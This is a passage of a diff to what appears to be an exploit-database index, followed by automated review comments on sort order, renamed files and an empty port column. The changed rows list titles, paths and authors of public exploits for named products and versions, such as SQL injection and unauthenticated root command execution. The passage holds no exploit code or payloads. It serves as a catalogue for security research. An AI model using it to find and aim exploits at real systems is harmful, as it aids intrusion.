Injection / Server Side Request Forgery / Directory Enumeration / Cross-Site Scripting",2017-05-09,"SEC Consult",webapps,php, 41985,exploits/aspx/webapps/41985.txt,"Personify360 7.5.2/7.6.1 - Improper Access Restrictions",2017-05-09,"Pesach Zirkind",webapps,aspx, 
@@ -37901,7 +37907,7 @@ id,file,description,date,author,type,platform,port 42489,exploits/php/webapps/42489.txt,"LiveInvoices 1.0 - SQL Injection",2017-08-18,"Ihsan Sencan",webapps,php, 42490,exploits/php/webapps/42490.txt,"LiveSales 1.0 - SQL Injection",2017-08-18,"Ihsan Sencan",webapps,php, 42491,exploits/php/webapps/42491.txt,"LiveProjects 1.0 - SQL Injection",2017-08-18,"Ihsan Sencan",webapps,php, -42519,exploits/jsp/webapps/42519.txt,"Symantec Messaging Gateway 10.6.3-2 - Unauthenticated root Remote Command Execution",2017-08-18,"Philip Pettersson",webapps,jsp, +42519,exploits/jsp/webapps/42519.txt,"Symantec Messaging Gateway 10.6.3-2 - Unauthenticated Root Remote Command Execution",2017-08-18,"Philip Pettersson",webapps,jsp, 42492,exploits/php/webapps/42492.txt,"Joomla! Component Appointment 1.1 - SQL Injection",2017-08-18,"Ihsan Sencan",webapps,php, 42493,exploits/php/webapps/42493.txt,"Joomla! Component Twitch Tv 1.1 - SQL Injection",2017-08-18,"Ihsan Sencan",webapps,php, 42494,exploits/php/webapps/42494.txt,"Joomla! Component KissGallery 1.0.0 - SQL Injection",2017-08-18,"Ihsan Sencan",webapps,php, 
@@ -38099,8 +38105,8 @@ id,file,description,date,author,type,platform,port 42927,exploits/php/webapps/42927.txt,"ConverTo Video Downloader & Converter 1.4.1 - Arbitrary File Download",2017-09-29,"Ihsan Sencan",webapps,php, 42931,exploits/hardware/webapps/42931.txt,"HBGK DVR 3.0.0 build20161206 - Authentication Bypass",2017-09-24,"RAT - ThiefKing",webapps,hardware, 42933,exploits/hardware/webapps/42933.txt,"NPM-V (Network Power Manager) 2.4.1 - Password Reset",2017-10-02,"Saeed reza Zamanian",webapps,hardware, -42934,exploits/php/webapps/42934.txt,"phpCollab 2.5.1 - Arbitrary File Upload",2017-10-02,Sysdream,webapps,php, -42935,exploits/php/webapps/42935.txt,"phpCollab 2.5.1 - SQL Injection",2017-10-02,Sysdream,webapps,php, +42934,exploits/php/webapps/42934.md,"phpCollab 2.5.1 - Arbitrary File Upload",2017-10-02,Sysdream,webapps,php, +42935,exploits/php/webapps/42935.md,"phpCollab 2.5.1 - SQL Injection",2017-10-02,Sysdream,webapps,php, 42939,exploits/jsp/webapps/42939.txt,"OpenText Document Sciences xPression 4.5SP1 Patch 13 - 'jobRunId' SQL Injection",2017-10-02,"Marcin Woloszyn",webapps,jsp, 42940,exploits/jsp/webapps/42940.txt,"OpenText Document Sciences xPression 4.5SP1 Patch 13 - 'documentId' SQL Injection",2017-10-02,"Marcin Woloszyn",webapps,jsp, 42947,exploits/hardware/webapps/42947.txt,"Fiberhome AN5506-04-F - Command Injection",2017-10-03,Tauco,webapps,hardware, 
@@ -38227,4 +38233,5 @@ id,file,description,date,author,type,platform,port 43158,exploits/hardware/webapps/43158.txt,"Icon Time Systems RTC-1000 Firmware 2.5.7458 - Cross-Site Scripting",2017-11-17,"Keith Thome",webapps,hardware, 43177,exploits/multiple/webapps/43177.txt,"CommuniGatePro 6.1.16 - Cross-Site Scripting",2017-11-15,"Boumediene KADDOUR",webapps,multiple, 43188,exploits/hardware/webapps/43188.txt,"ZTE ZXDSL 831CII - Improper Access Restrictions",2017-11-27,"Ibad Shah",webapps,hardware, -43190,exploits/cgi/webapps/43190.py,"Synology StorageManager 5.2 - Remote Root Command Execution",2017-11-28,SecuriTeam,webapps,cgi, +43190,exploits/cgi/webapps/43190.py,"Synology StorageManager 5.2 - Root Remote Command Execution",2017-11-28,SecuriTeam,webapps,cgi, +43196,exploits/php/webapps/43196.txt,"WordPress Plugin WooCommerce 2.0/3.0 - Directory Traversal",2017-11-28,Fu2x2000,webapps,php,
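Review bot: In the hunk at @@ -24923,6 +24928,7 @@, the new row 43191 (osCommerce 2.3.4.1, dated 2017-11-11) is spliced between rows 17350 and 17360, which are both from 2011, while the other new row in this file, 43196, is appended at the end in the last hunk. The file is not strictly sorted by id (17123 and 42519 also sit out of sequence), but a 2017 entry in the middle of the 2011 block looks accidental. Either move 43191 to the tail next to 43190 or state in the commit message why it belongs here, so that anyone who reads the file tail to find new entries does not miss it.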
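Review bot: In the hunk at @@ -25930,7 +25936,7 @@, row 21272 changes the product version from 4.62.00 to 4.62.0, which edits a version identifier rather than the title formatting. Please confirm the new string against the advisory text in exploits/asp/webapps/21272.txt. If the vendor labels the release 4.62.00, keep the original, since a search for that exact version would no longer match this row.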
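Review bot: In the hunk at @@ -36282,7 +36288,7 @@, row 38750 changes its file column from 38750.txt to 38750.md, and only the index side of that rename is visible here. Please confirm that the file itself is renamed in the same commit so the path does not dangle, and that anything selecting entries by extension still handles .md. The same check applies to the other .txt to .md rows in the later hunks: 39243, 40065, 40877, 41150, 41746, 41747, 41967, 42934 and 42935.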
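Review bot: In the hunk at @@ -38227,4 +38233,5 @@, the added row 43196 leaves the port column empty, while other WordPress plugin rows in this file, such as 41966 and 40070, carry 80. Please fill the column or leave it empty by a stated rule, because filtering on port currently returns an inconsistent subset of the web application entries. The retitle of 43190 to "Root Remote Command Execution" matches the 42519 change in the hunk at @@ -37901,7 +37907,7 @@, so the wording is consistent across both rows.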